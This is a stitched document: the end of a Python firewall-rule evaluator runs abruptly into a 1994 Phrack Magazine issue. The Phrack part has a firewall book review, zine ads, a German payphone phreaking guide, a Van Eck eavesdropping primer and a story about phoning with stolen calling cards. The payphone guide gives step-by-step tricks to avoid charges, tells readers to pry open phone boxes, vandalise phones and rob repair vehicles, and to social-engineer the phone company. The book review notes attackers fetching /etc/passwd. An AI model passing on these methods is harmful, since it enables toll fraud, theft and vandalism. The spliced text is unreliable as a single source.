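MAIL_IN = Rule("mail-in", "permit", iface="outside", dst=MAIL_GW, proto="tcp", dport=25)
# Outbound traffic must carry a genuine inside source address.
INSIDE_OUT = Rule("inside-out", "permit", iface="inside", src=INSIDE)

RULES = (ANTI_SPOOF, MAIL_IN, INSIDE_OUT)


def evaluate(pkt: Packet, rules: Sequence[Rule] = RULES) -> Tuple[str, str]:
    """Return (action, rule name) for the first matching rule; deny by default."""
    try:
        src = ipaddress.ip_address(pkt.src)
        dst = ipaddress.ip_address(pkt.dst)
    except ValueError:
        return ("deny", "malformed-address")
    for rule in rules:
        if rule.matches(pkt, src, dst):
            return (rule.action, rule.name)
    return ("deny", "default-deny")


# Constructed sample traffic.
SAMPLE_PACKETS = (
    Packet("outside", "198.51.100.7", "192.0.2.25", "tcp", 25),   # real mail
    Packet("outside", "192.0.2.10", "192.0.2.25", "tcp", 25),     # forged inside source
    Packet("outside", "198.51.100.7", "192.0.2.10", "tcp", 23),   # telnet probe
    Packet("inside", "192.0.2.10", "203.0.113.5", "tcp", 80),     # normal outbound
    Packet("inside", "203.0.113.99", "198.51.100.7", "udp", 53),  # bad source leaving
)


def verdicts(rules: Sequence[Rule] = RULES):
    """Evaluate every sample packet against the given rule order."""
    return [evaluate(pkt, rules) for pkt in SAMPLE_PACKETS]


if __name__ == "__main__":
    for pkt, verdict in zip(SAMPLE_PACKETS, verdicts()):
        print(pkt, "->", verdict)
```

Rule order is the part to check on a real router: with MAIL_IN listed ahead of ANTI_SPOOF, the forged packet in the samples is permitted by the mail rule before the anti-spoofing rule is ever consulted.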
What do we learn from the hacker-related chapters? Let's take Berferd: The Sendmail DEBUG hole expert. After mailing himself a password file and receiving it with a space after the username, he tries to add accounts in a similar fashion. Cheswick calls him "flexible". I might have chosen another F-word. Next are the hacker logs. People finger. People tftp /etc/passwd. People try to rlogin as bin. There are no advanced attacks in these sections. Compared with the scary picture painted in the Firewalls chapter -- that of the Bad Guy spoofing hostnames, flooding DNS caches, faking NFS packets and much more -- something must have gone wrong.(**)

Still, I cannot say that this information is totally useless. It is, as mentioned, old. It is available and was available since 1992 on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)

The bottom line is that this book is, in my opinion, foremost and upmost a Firewaller's book. The hacker section could have been condensed into Appendix D, a copy of the CERT advisory about computer attacks ("Don't use guest/guest. Don't leave root unpassworded.") It really takes ignorance to believe that inexperienced hackers can learn "hacker techniques" and become mean Internet break-in machines just by reading _Firewalls and Internet Security_.

Yes, even the chapter dedicated to trying to attack your own machine to test your security (The Hacker's Workbench) is largely theoretical. That is to say, it doesn't go above comments like "attack NFS". The probes and source code supplied there are for programs like IP subnet scanners and so on, and not for "high-level" stuff like ICMP bombers or similar software; only the attacks are mentioned, not the implementation. This is, by the way, quite understandable and expected, but don't buy this book if you think it will make you into some TCP/IP attacker wiz.

In summary:

THE GOOD

The Firewalls part is excellent. The other parts not related to hacker-tracking are good as well.
The added bonuses -- in the form of a useful index, a full bibliography (with pointers to FTP sites), a TCP port list with interesting comments and a great (running out of positive descriptions here) online resources list -- are also grand (whew).

THE BAD

The hacker studies sections, based on old (circa 1992) papers, are not interesting for anyone with any knowledge of hacking and/or security who had some sort of encounters with hackers. People without this knowledge might either get the idea that: (a) all hackers are stupid and (b) all hackers are Berferd-style system formatters. Based on the fact that the authors do not make a clear-cut statement about hiring or not hiring hackers, they just say that you should think if you trust them, and that they generally appear not to have a total draconian attitude towards hackers in general, I don't think this was intentional.

THE UGLY (For the nitpickers)

There are some nasty little bugs in the book. They're not errors in that sense of the word; they're just kind of annoying -- if you're sensitive about things like being called a hacker or a cracker, they'll annoy you. Try this: although they explain why they would use the term "hacker" when referring to hackers (and not "eggsucker", or "cracker"), they often use terms like "Those With Evil Intention". Or, comparing _2600 Magazine_ to the Computer underground Digest.

(*) From the Firewalls FAQ : ``A firewall is any one of several ways of protecting one network from another untrusted network. The actual mechanism whereby this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic.''

(**) This would be a great place to start a long and boring discussion about different types of hackers and how security (including firewalls) affect them. But...
I don't think so.

(***) ftp://research.att.com:/dist/internet_security/firewall.book also contains, in text and PostScript, the list of parts, chapters and sections in the book, and the Preface section. For that reason, those sections weren't printed here. All the papers mentioned in this review can be found on that FTP site.

------------------------------------------------------------------------------

Announcing Bellcore's Electronic Information Catalog for Industry Clients...

To access the online catalog:

        telnet info.bellcore.com
        login: cat10

or dial 201-829-2005
        annex: telnet info
        login: cat10

[Order up some E911 Documents Online!]

------------------------------------------------------------------------------

TTTTT H   H EEEEE
  T   H   H E
  T   HHHHH EEEEE
  T   H   H E
  T   H   H EEEEE

 CCC  U   U RRRR  M   M U   U DDDD   GGG  EEEEE  OOO  N   N
C   C U   U R   R MM MM U   U D   D G   G E     O   O NN  N
C     U   U RRRR  M M M U   U D   D G     EEEEE O   O N N N
C   C U   U R   R M   M U   U D   D G  GG E     O   O N  NN
 CCC   UUU  R   R M   M  UUU  DDDD   GGG  EEEEE  OOO  N   N

Bill Clinton promised good health care coverage for everyone.
Bill Clinton promised jobs programs for the unemployed.
Bill Clinton promised that everyone who wanted could serve in the military.
Bill Clinton promised a lot.

So does the Curmudgeon.

But unlike Bill Clinton, we'll deliver...

For only $10 a year (12 issues) you'll get alternative music reviews and interviews, political reporting, anti-establishment features and commentary, short fiction, movie reviews, book reviews, and humor. Learn the truth about the Gulf War, Clipper, and the Selective Service System. Read everything you wanted to know about bands like the Offspring, R.E.M., the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and Nine Inch Nails. Become indoctrinated by commentary that just might change the way you think about some things.

Subscribe to the Curmudgeon on paper for $10 or electronically for free.
Electronic subscribers don't get everything that paying subscribers do like photos, spoof ads, and some articles.

Paper: send $10 check or money order to
        the Curmudgeon
        4505 University Way N.E.
        Box 555
        Seattle, Washington 98105

Electronic: send a request to rodneyl@u.washington.edu

------------------------------------------------------------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% The Journal Of American Underground Computing - ISSN 1074-3111 %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Computing - Communications - Politics - Security - Technology - Humor
-Underground - Editorials - Reviews - News - Other Really Cool Stuff-

Published Quarterly/Semi-Quarterly By Fennec Information Systems

This is one of the more popular new electronic publications. To get your free subscription, please see the addresses below. Don't miss out on this newsworthy publication. We are getting hundreds of new subscriptions a month. This quarterly was promoted in Phrack Magazine. If you don't subscribe, you're only cheating yourself. Have a great day...and a similar tomorrow

* Coming soon * A Windows-based help file containing all of the issues of the magazine as well as extensive bio's of all of the editors.

Subscription Requests: sub@fennec.com
Comments to Editors  : editors@fennec.com
Back issues via Ftp  : etext.archive.umich.edu /pub/Zines/JAUC
                       fc.net /pub/tjoauc
Submissions          : submit@fennec.com
Finger info          : dfox@fc.net and kahuna@fc.net

------------------------------------------------------------------------------

Make the best out of your European pay telephone
by Onkel Dittmeyer, onkeld@ponton.hanse.de
-----------------------------------------------------

Okay guys and girls, let's come to a topic old like the creation but yet never revealed. European, or, to be more exact, German pay phone technology. Huh-huh.
There are several models, round ones, rectangular ones, spiffy looking ones, dull looking ones, and they all have one thing in common: If they are something, they are not what the American reader might think of a public pay telephone, unlike its U.S. brothers, the German payphones always operate off a regular customer-style telephone line, and therefore they're basically all COCOTS, which makes it a lot easier to screw around with them.

Let's get on with the models here. You are dealing with two classes; coin-op ones and card-op ones. All of them are made by Siemens and TELEKOM. The coin-op ones are currently in the process of becoming extinct while being replaced by the new card-op's, and rather dull. Lacking all comfort, they just have a regular 3x4 keypad, and they emit a cuckoo tone if you receive a call. The only way to tamper with these is pure physical violence, which is still easier than in the U.S.; these babies are no fortresses at all.

Well, while the coin-op models just offer you the opportunity of ripping off their money by physically forcing them open, there is a lot more fun involved if you're dealing with the card babies. They are really spiffy looking, and I mean extraordinary spiffy. Still nothing compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line pixel-oriented LCD readout displays the pure K-Radness of its inventors. Therefore it is equipped with a 4x4 keypad that has a lot of (undocumented) features like switching the mother into touch-tone mode, redial, display block etc. Plus, you can toggle the readout between German, English, and French. There are rumors that you can put it into Mandarin as well, but that has not been confirmed yet.

Let's get ahead. Since all payphones are operating on a regular line, you can call them up. Most of them have a sign reading their number, some don't.
For those who don't, there is no way for you to figure out their number, since they did not invent ANI yet over here in the country famous for its good beer and yodel chants. Well, try it. I know you thought about it. Call it collect. Dialing 010 will drop you to a long-distance operator, just in case you didn't know. He will connect the call, since there is no database with all the payphone numbers, the payphone will ring, you pick up, the operator will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?

This would not be Phrack if there would be no way to screw it. If you examine the hook switch on it closely, you will figure out that, if you press it down real slow and carefully, there are two levels at which it provokes a function; the first will make the phone hang up the line, the second one to reset itself. Let me make this a little clearer in your mind.

                          -----    <--- totally released
                            |
                            |
                            |      <--- hang up line
 press to this level -->    |
                            |      <--- reset
                            |
                          -----    <--- totally hung up

Involves a little practice, though. Just try it. Dial a number it will let you dial, like 0130, then it will just sit there and wait for you to dial the rest of the number. Start pressing down the hookswitch really slow till the line clicks away into suspense, if you release it again it will return you to the dial tone and you are now able to call numbers you aren't supposed to call, like 010 (if you don't have a card, don't have one, that's not graceful), or 001-212-456-1111. Problem is, the moment the other party picks up, the phone will receive a charge subtraction tone, which is a 16kHz buzz that will tell the payphone to rip the first charge unit, 30 pfennigs, off your card, and if you don't have one inserted and the phone fails to collect it, it will go on and reset itself disconnecting the line. Bad luck. Still good enough to harass your favorite fellas for free, but not exactly what we're looking for, right? Try this one.
Push the hook lever to the suspension point, and let it sit there for a while, you will have to release it a bit every 5 seconds or so, or the phone will reset anyway. If you receive a call while doing this, a buzz will appear on the line. Upon that buzz, let the lever go and you'll be connected, and the cuckoo tone will be shut up! So if you want to receive a collect call, this is how you do it. Tell the operator you accept the charges, and talk away. You can use this method overseas, too: Just tell your buddy in the states to call Germany Direct (800-292-0049) and make a collect call to you waiting in the payphone, and you save a cool $1.17 a minute doing that. So much for the kids that just want to have some cheap fun, and on with the rest. Wasting so much time in that rotten payphone, you probably noticed the little black box beneath the phone. During my, erm, research I found out that this box contains some fuses, a standard Euro 220V power connector, and a TAE-F standard phone connector. Completing the fun is the fact that it's extremely easy to pry it open. The TAE-F plug is also bypassing the phone and the charge collection circuits, so you can just use it like your jack at home. Bring a crowbar and your laptop, or your Pentium tower, power it over the payphone and plug your Dual into the jack. This way you can even run a board from a payphone, and people can download the latest WaReZzzZzz right from the booth. It's preferable to obtain a key for the lock of the box, just do some malicious damage to it (yes, let the animal take control), and call Telekom Repairs at 1171 and they will come and fix it. Since they always leave their cars unlocked, or at least for the ones I ran across, you can either take the whole car or all their k-rad equipment, manuals, keys, and even their lunch box. But we're shooting off topic here. The keys are usually general keys, means they fit on all payphones in your area. 
There should also be a nationwide master key, but the German Minister of Telecommunications is probably keeping that one in his desk drawer.

The chargecards for the card-op ones appear to have a little chip on them, where each charge unit is being deducted. So far no-one could figure out how it works, or how to refill the cards or make a fake one, but a lot of German phreaks are busy trying to figure that out.

A good approach is also social-engineering Telekom so they turn off the charge deduction signal (which doesn't mean the calls are free, but the buzz is just not transmitted any more) so the phone doesn't receive a signal to charge you any money no matter where you call. The problem with this method is that the word will spread in the neighborhood that there is a payphone where you can call for free, and therefore it will be so crowded that you can't use it, and the phone pals will catch up fast. It's fun though, I tried it, and I still get free drinks at the local pub for doing it.

Another k-rad feature on them is the built-in modem that they use to get their software. On a fatal error condition they appear to dial a telecom number and download the latest software just how their ROM commands them to do. We will shortly take a phone, install it somewhere else and figure out where it calls, what the protocol is and what else is being transmitted, but that will probably be in another Phrack.

If you found out anything that might be of interest, you are welcome to mail it to onkeld@ponton.hanse.de using the public key beneath. Unencrypted mail will be killed since ponton.hanse.de is run by a paranoid bitch that reads all traffic just for the hell of it, and I don't want the phedzZz to come and beat me over the head with a frozen chunk o' meat or worse.

Stay alert, watch out and have fun...
------------------------------------------------------------------------------

  _   _                                                          _   _
 ((___))               INFORMATION IS JUNK MAIL                 ((___))
 [ x x ]                                                        [ x x ]
  \   /                  cDc communications                      \   /
  (' ')           -cDc- CULT OF THE DEAD COW -cDc-               (' ')
   (U)                                                            (U)
deal with it,      presents unto you 10 phat t-files,      deal with it,
S U C K E R             fresh for July 1994:               S U C K E R

New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994:

 _________________________________/Text Files\_________________________________

261: "Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth interview with the editor of the popular 'zine, _Mudflap_.

262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper presented for the 1993 National Popular Culture Association meeting in New Orleans.

263: "What Color Is the Sky in Your World?" by Tequila Willy. Here's your homework, done right for you by T. "Super-Brain" Willy.

264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here's a new watermark low level of depravity and sickness. If you don't know what a "chicken hawk" is already, read the story and then you'll understand.

265: "Eye-r0N-EE" by Swamp Ratte'. This one's interesting 'cause only about half-a-dozen or so lines in it are original. The rest was entirely stuck together from misc. files on my hard drive at the time. Some art guy could say it's a buncha post-this&that, eh? Yep.

266: "Interview with Barbie" by Clench. Barbie's got her guard up. Clench goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dope. This is a boxing reference to a technique mastered by The Greatest of All Time, Muhamed Ali.
267: "About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph. Tiny bunnies run about, unhindered, to find their own fate.

268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you surprised?

269: "Prophile: Future History" by THE NIGHTSTALKER. It's the future, things are different, but the Master Hacker Dude lives on.

270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop.

 __________________________________/cDc Gnuz\__________________________________

"And that no man might buy or sell, save he that had the mark, or the name of the Cow, or the number of his name. Here is wisdom. Let him that hath understanding count the number of the Cow: for it is the number of a man; and his number is eight billion threescore and seven million nine hundred fourty-four thousand three hundred threescore and two. So it is written." -Omega

Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks cDc's 8th year of existence. Outlasting everyone to completely rule and dominate all of cyberspace, blah blah blah. Yeah, think a special thought about cDc's significance in YOUR life the next time you go potty. Name your firstborn child after me, and we'll call it karmicly even, pal. My name is Leroy.

We're always taking t-file submissions, so if you've got a file and want to really get it out there, there's no better way than with cDc. Upload text to The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post office box in Lubbock, TX. No song lyrics and bad poetry please; we'll leave that to the no-class-havin', bottom-feeder e-shoveling orgs. out there.

News item of the month, as found by Count Zero:

"ROTTING PIG FOUND IN DITCH

VERDEN, OKLAHOMA - Responding to a tip from an employee, Verden farmer Bill McVey found a rotting pig in a ditch two miles north of town. Farmer McVey reported the pig to the authorities, because you cannot, legally, just leave a dead pig in a ditch.
You must dispose of your deceased livestock properly. There are companies that will take care of this for you. As for proper disposal of large dead animals, McVey contracts with Used Cow Dealer."

"...and the rivers ran red with the bl00d of the Damned and the Deleted..." -Dem0nSeed

S. Ratte'
cDc/Editor and P|-|Ear13zz |_3@DeRrr
"We're into t-files for the groupies and money."
Middle finger for all.

Write to: cDc communications, P.O. Box 53011, Lubbock, TX 79453.
Internet: sratte@phantom.com.

ALL cDc FILES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC.
_____________________________________________________________________________
cDc Global Domination Update #16-by Swamp Ratte'-"Hyperbole is our business"
Copyright (c) 1994 cDc communications. All Rights Reserved.

------------------------------------------------------------------------------

===[ Radio Modification Project ]===========================================>

Tuning in to Lower Frequency Signals                            June 26, 1994

====================================================[ By: Grendel / 905 ]===>

The lower frequency regions of the radio spectrum are often ignored by ham'ers, pirates, and DX'ers alike due to the relatively little known ways of tuning in. The following article will detail how to construct a simple-made antenna to tune in to the LF's and show how to adjust an amateur band type radio to receive the desired signals.

The lower frequency spectrum has been made to include the very low frequency ("VLF" 2 kHz to 30 kHz) band and a small part of the medium frequency ("MF" 300 - 500 kHz) band. For our purposes, a suitable receiver must be able to cover the 2 kHz to 500 kHz range as well as being calibrated at 10 kHz intervals (standard). The receiver must also be capable of covering AM and CW broadcasts. For best capabilities, the receiver should also be able to cover LSB ("lower side band") and USB ("upper side band").
The Receiving System
`'`'`'`'`'`'`'`'`'`'

The receiver I use consists of a standard amateur HF ("High Frequency") band receiver adjusted between the 3,500 and 4,000 kHz bands. This causes the receiver to act as a tuneable IF ("Intermediate Frequency") and also as demodulator. You will also require a wideband LF ("Low Frequency") converter which includes a 3,500 kHz crystal oscillator. See Fig. 1:

.==[ Fig 1. Block Diagram ]============================.
|  _____                                               |
|  \ANT/                                               |
|   \./        crystal                                 |
|    |      ______|______       ____________           |
|    `-----| 2 - 500 kHz |     | 3-4000 kHz |          |
|          |  Converter* |--~--| IF Receiver|---OUTPUT |
|    .-----|_____________|     |____________|          |
|    |                                                 |
|   GND                                                |
|______________________________________________________|

*The converter is a circuit board type 80D/L-101/PCB available from L.F. Engineering Co, 17 Jeffry Road, East Haven CT, 06513 for $43 US including S & H. One may be constructed to work with your receiver (but at a higher price no doubt).

Phono jack plugs and sockets are used for the interconnections throughout the receiving system and the converter and receiver (~) are connected with RG58 coax cable of no greater length than 4 ft.

When tuning, the station frequency is measured by deducting 3,500 kHz from the scale on the main receiver (ie. 340 kHz = 3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595 kHz, etc.)

The Ferrite End-fed Antenna
`'`'`'`'`'`'`'`'`'`'`'`'`'`

This is a small antenna designed to tune between 95 kHz and 500 kHz. It consists of a coil wound around a ferrite rod, with a 4 ft. lead.
Materials:

 o 7 7/8" x 3/8" ferrite rod
 o 5" 24 SWG double cotton covered copper wire
 o 2 PLASTIC coated terry clips
 o a wood or plastic base (8 1/2" x .8" x .5")
 o 2 standard, two-gang 500 pF tuning capacitors
 o a plastic plate (preferably 2" high)

------------------------------------------------------------------------------

        -- A Few Things on Van Eck's Method of Eavesdropping --

                    Opticon the Disassembled - UPi

Dr. Wim Van Eck was the one who developed the anonymous method for eavesdropping on computers (and, apparently, not only computers) from a distance, in the laboratories of Neher, Holland. This method is based on the fact that monitors emit electromagnetic radiation. As a device, it is not too complex and it can be constructed by an experienced electronics phreak. It uses a simple-direction antenna which grabs monitor signals from about 800 meters away. Simplified schematics are available from Consumertronics.

TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard. It concerns the quantity of electromagnetic radiation from monitors and televisions, although such radiation can also be detected from keyboards, wires, printers and central units. There are some security levels at which such radiation is supposed to be untraceable by Van Eck systems. Those security levels, or standards, are described thoroughly in a technical exposition called NACSIM 5100A, which the NSA has classified.

Variations in the voltage of the electrical current cause electromagnetic pulses in the form of radio waves. In cathode ray tube (C.R.T.) devices, such as televisions and monitors, a source of electrons scans the internal surface and activates the phosphor. Whether the scanning is interlaced or non-interlaced, most monitors transmit frequencies varying from 50 to 75 MHz per second. They also transmit harmonic frequencies, multiples of the basic frequencies; for example a transmitter with a signal of 10 MHz per second will also transmit waves of 20, 30, 40 etc. MHz. Those signals are weaker because the transmitter itself effaces them. Such variations in the voltage are what the Van Eck system receives and analyzes.

There are ways to prevent or make it harder for someone to monitor your monitor. Obviously you cannot place your computer system underground and cover it with a Faraday cage or a copper shield (if your case is already that, then you know more about Van Eck than I do). What else?

(1) Certain computers, such as Wang's, prevent such leakage; give preference to them.

(2) Place your monitor into a grounded metal box, 1.5 cm thick.

(3) Trace your tracer(s). They gonna panic.

(4) Increasing the brightness and lowering the contrast reduces TEMPEST's power. Metal objects, like bookshelves, around the room, will also help a little bit.

(5) Make sure that two or more monitors are transmitting at the same frequency and let them operate simultaneously; this will confuse Van Eck systems.

(6) Buy or make on your own, a device which will transmit noise at your monitor's frequency.

(7) Act naturally. That is:

    (a) Call IRC, join #hack and never mumble a single word.
    (b) Read only best selling books.
    (c) Watch television at least 8 hours a day.
    (d) Forget altruism; there is only you, yourself and your dick/crack.

(8) Turn the monitor off.

------------------------------------------------------------------------------

                            -Almost Busted-

                             By: Deathstar

It all started one week in the last month of summer. Only my brother and I were at the house for the whole week, so I did whatever I wanted. Every night, I would phreak all night long. I would be either at a payphone using AT&Tz, or at home sitting on a conference. I would be on the phone till at least four or five in the morning.
But one night, my luck was running thin, and I almost phreaked for the last time. I was at a payphone, using cards. I had been there since around twelve midnight.. The payphone was in a shopping center with a supermarket and a few other stores. Most every thing closed at eleven.. Except for the nearby gas station. Anyway, I was on the phone with only one person that night. I knew the card would be dead by the end of the night so I went ahead and called him on both of his lines with both of the payphones in the complex with the same card. I had talked for hours. It started to get misty and hard to see. Then, I noticed a car of some kind pulling into the parking lot. I couldn't tell what kind of car it was, because it was so dark. The car started pulling up to me, and when it was around twenty feet away I realized it was a police car. They got on the loudspeaker and yelled "Stay where you are!". I dropped the phone and ran like hell past the supermarket to the edge of the complex. I went down a bike path into a neighborhood of townhouses. Running across the grass, I slipped and fell about two or three times. I knew they were following me, so I had to hide. I ran to the area around the back of the supermarket into a forest. I smacked right into a fence and fell on the ground. I did not see the fence since it was so dark. Crawling a few feet, I laid down and tried to cover my body with some leaves and dirt to hide. I was wearing an orange shirt and white shorts. I laid as still as I could, covered in dirt and leaves. I could hear the police nearby. They had flashlights and were walking through the forest looking for me. I knew I would get busted. I tried as hard as I could to keep from shaking in fear. I lay there for around thirty minutes. Bugs were crawling around on my legs biting me. I was itching all over. I couldn't give up though, because if they caught me I knew that would be the end of my phreaking career. 
I was trying to check if they were still looking for me, because I could not hear them. Just as I was about to make a run for it, thinking they were gone I heard a police radio. I sat tight again. For another hour, I lay there until finally I was sure they were gone. I got up and started to run. I made my way through the neighborhood to my house. Finally I got home. It was around five thirty a.m. I was filthy. The first thing I did was call the person I was talking to on the payphone and tell him what happened. Then, I changed clothes and cleaned myself up. I checked my vmb to find that a conference was up. I called it, and told my story to everyone on. I thought that was the end of my confrontation with the police, but I was wrong. The next day I had some people over at my house. Two or Three good friends. One of them said that there was a fugitive loose in our town. We were bored so we went out in the neighborhood to walk around and waste time. Hardly anyone was outside, and police cars were going around everywhere. One guy did leave his house but he brought a baseball bat with him. We thought it was funny. Anyway, we soon got bored and went back home. Watching tv, we turned to the news. They had a Report about the Fugitive. We watched. It showed a picture of the shopping center I was at. They said "One suspect was spotted at this shopping center last night at around four thirty in the morning. The officer is around ninety five percent sure that the suspect was the fugitive. He was wearing a orange shirt and white shorts, and ran when approached." I then freaked out. They were searching my neighborhood for a fugitive that didn't exist! I called back the guy I was talking to the night before and told him, and then told everyone that was on the conference the night before. It ended up that the fugitives never even entered our state. They were caught a week later around thirty miles from the prison they escaped from. Now I am known by two nicknames. 
"NatureBoy" because everyone says I communed with nature for a hour and a half hiding from the police, and "The Fugitive" for obvious reasons. Anywayz, That's how I was almost busted.. -DS ------------------------------------------------------------------------------ The following is a *true* story. It amused the hell out of me while it was happening. I hope it isn't one of those "had to be there" things. Copyright 1994 Captain Sarcastic, all rights reserved. On my way home from the second job I've taken for the extra holiday ca$h I need, I stopped at Taco Bell for a quick bite to eat. In my billfold is a $50 bill and a $2 bill. That is all of the cash I have on my person. I figure that with a $2 bill, I can get something to eat and not have to worry about people getting pissed at me. ME: "Hi, I'd like one seven layer burrito please, to go." IT: "Is that it?" ME: "Yep." IT: "That'll be $1.04, eat here?" ME: "No, it's *to* *go*." [I hate effort duplication.] At his point I open my billfold and hand him the $2 bill. He looks at it kind of funny and IT: "Uh, hang on a sec, I'll be right back." He goes to talk to his manager, who is still within earshot. The following conversation occurs between the two of them. IT: "Hey, you ever see a $2 bill?" MG: "No. A what?" IT: "A $2 bill. This guy just gave it to me." MG: "Ask for something else, THERE'S NO SUCH THING AS A $2 BILL." [my emp] IT: "Yeah, thought so." He comes back to me and says IT: "We don't take these. Do you have anything else?" ME: "Just this fifty. You don't take $2 bills? Why?" IT: "I don't know." ME: "See here where it says legal tender?" IT: "Yeah." ME: "So, shouldn't you take it?" IT: "Well, hang on a sec." He goes back to his manager who is watching me like I'm going to shoplift, and IT: "He says I have to take it." MG: "Doesn't he have anything else?" IT: "Yeah, a fifty. I'll get it and you can open the safe and get change." MG: "I'M NOT OPENING THE SAFE WITH HIM IN HERE." 
[my emp] IT: "What should I do?" MG: "Tell him to come back later when he has REAL money." IT: "I can't tell him that, you tell him." MG: "Just tell him." IT: "No way, this is weird, I'm going in back." The manager approaches me and says MG: "Sorry, we don't take big bills this time of night." [it was 8pm and this particular Taco Bell is in a well lighted indoor mall with 100 other stores.] ME: "Well, here's a two." MG: "We don't take *those* either." ME: "Why the hell not?" MG: "I think you *know* why." ME: "No really, tell me, why?" MG: "Please leave before I call mall security." ME: "Excuse me?" MG: "Please leave before I call mall security." ME: "What the hell for?" MG: "Please, sir." ME: "Uh, go ahead, call them." MG: "Would you please just leave?" ME: "No." MG: "Fine, have it your way then." ME: "No, that's Burger King, isn't it?" At this point he BACKS away from me and calls mall security on the phone around the corner. I have two people STARING at me from the dining area, and I begin laughing out loud, just for effect. A few minutes later this 45 year oldish guy comes in and says [at the other end of counter, in a whisper] SG: "Yeah, Mike, what's up?" MG: "This guy is trying to give me some [pause] funny money." SG: "Really? What?" MG: "Get this, a *two* dollar bill." SG: "Why would a guy fake a $2 bill?" [incredulous] MG: "I don't know? He's kinda weird. Says the only other thing he has is a fifty." SG: "So, the fifty's fake?" MG: "NO, the $2 is." SG: "Why would he fake a $2 bill?" MG: "I don't know. Can you talk to him, and get him out of here?" SG: "Yeah..." Security guard walks over to me and says SG: "Mike here tells me you have some fake bills you're trying to use." ME: "Uh, no." SG: "Lemme see 'em." ME: "Why?" SG: "Do you want me to get the cops in here?" At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so I said ME: "I'm just trying to buy a burrito and pay for it with this $2 bill." 
I put the bill up near his face, and he flinches like I was taking a swing at him. He takes the bill, turns it over a few times in his hands, and says SG: "Mike, what's wrong with this bill?" MG: "It's fake." SG: "It doesn't look fake to me." MG: "But it's a **$2** bill." SG: "Yeah?" MG: "Well, there's no such thing, is there?" The security guard and I both looked at him like he was an idiot, and it dawned on the guy that he had no clue. My burrito was free and he threw in a small drink and those cinnamon things, too. Makes me want to get a whole stack of $2 bills just to see what happens when I try to buy stuff. If I got the right group of people, I could probably end up in jail. At least you get free food. ------------------------------------------------------------------------------ ==Phrack Magazine== Volume Five, Issue Forty-Six, File 4 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ The official Legion of Doom t-shirts are still available. Join the net.luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) 
"LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ introducing... The PHRACK Horoscope, Summer 1994 Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer --- Do you believe in the stars? Many do, some don't. In fact, the stars can tell you a whole lot about the future. That's bullshit? You don't believe it? Good. Be doomed. See you in hell. Here's the official PHRACK horoscope for all eleet hackerz for the summer of 1994. You can use this chart to find out your zodiac sign by your DOB. 
Aquarius.....01/20 - 02/18        Leo..........07/23 - 08/22
Pisces.......02/19 - 03/20        Virgo........08/23 - 09/22
Aries........03/21 - 04/19        Libra........09/23 - 10/22
Taurus.......04/20 - 05/20        Scorpio......10/23 - 11/21
Gemini.......05/21 - 06/20        Sagittarius..11/22 - 12/21
Cancer.......06/21 - 07/22        Capricorn....12/22 - 01/19

---

              oOo This summer's best combinations oOo

YOU             LOVE            BS VICTIM       H0T WAREZ
==============================================================
Aquarius        Libra           Leo             Sagittarius
Pisces          Sagittarius     Aquarius        Cancer
Aries           Aries           Cancer          Capricorn
Taurus          Gemini          Pisces          Taurus
Gemini          Cancer          Aries           Scorpio
Cancer          Leo             Virgo           Gemini
Leo             Scorpio         Gemini          Leo
Virgo           Capricorn       Sagittarius     Libra
Libra           Virgo           Libra           Virgo
Scorpio         Pisces          Capricorn       Pisces
Sagittarius     Aquarius        Scorpio         Aquarius
Capricorn       Taurus          Taurus          Aries
==============================================================

---

And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!

Aries [March 21st - April 19th]

